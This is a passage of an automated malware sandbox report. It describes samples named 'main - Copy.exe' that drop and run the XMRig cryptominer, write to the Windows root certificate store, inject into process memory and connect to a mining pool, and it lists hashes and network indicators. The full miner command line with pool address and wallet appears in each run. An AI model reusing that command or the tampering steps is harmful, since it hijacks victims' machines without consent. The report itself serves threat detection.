51d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1144 wrote to memory of 3228 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1144 wrote to memory of 3228 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 52.111.227.14:443 | tcp | |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.112.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3228-16-0x0000026877000000-0x0000026877020000-memory.dmp
memory/3228-17-0x0000026878760000-0x0000026878780000-memory.dmp
memory/3228-18-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-19-0x0000026878780000-0x00000268787A0000-memory.dmp
memory/3228-20-0x00000268787A0000-0x00000268787C0000-memory.dmp
memory/3228-21-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-22-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-25-0x00000268787A0000-0x00000268787C0000-memory.dmp
memory/3228-24-0x0000026878780000-0x00000268787A0000-memory.dmp
memory/3228-23-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-26-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-27-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-28-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-29-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-30-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-31-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-32-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-33-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-34-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-35-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-36-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-37-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-38-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-39-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-40-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-41-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-42-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-43-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-44-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-45-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-46-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-47-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-48-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-49-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-50-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-51-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-52-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-53-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-54-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-55-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-56-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-57-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-58-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-59-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-60-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-61-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-62-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-63-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-64-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-65-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-66-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-67-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-68-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-69-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-70-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-71-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-72-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-73-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-74-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-75-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-76-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-77-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-78-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-79-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-80-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-81-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-82-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-83-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
memory/3228-84-0x00007FF6B3A80000-0x00007FF6B4583000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:08
Platform
win10v2004-20240426-en
Max time kernel
1799s
Max time network
1805s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4080 wrote to memory of 4828 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4080 wrote to memory of 4828 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4828-16-0x000001F7333E0000-0x000001F733400000-memory.dmp
memory/4828-17-0x000001F734CE0000-0x000001F734D00000-memory.dmp
memory/4828-18-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-20-0x000001F734D00000-0x000001F734D20000-memory.dmp
memory/4828-19-0x000001F734D20000-0x000001F734D40000-memory.dmp
memory/4828-21-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-22-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-23-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-25-0x000001F734D00000-0x000001F734D20000-memory.dmp
memory/4828-24-0x000001F734D20000-0x000001F734D40000-memory.dmp
memory/4828-26-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-27-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-28-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-29-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-30-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-31-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-32-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-33-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-34-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-35-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-36-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-37-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-38-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-39-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-40-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-41-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-42-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-43-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-44-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-45-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-46-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-47-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-48-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-49-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-50-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-51-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-52-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-53-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-54-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-55-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-56-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-57-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-58-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-59-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-60-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-61-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-62-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-63-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-64-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-65-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-66-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-67-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-68-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-69-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-70-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-71-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-72-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-73-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-74-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-75-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-76-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-77-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-78-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-79-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-80-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-81-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-82-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-83-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
memory/4828-84-0x00007FF71A480000-0x00007FF71AF83000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:08
Platform
win10v2004-20240426-en
Max time kernel
1796s
Max time network
1790s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
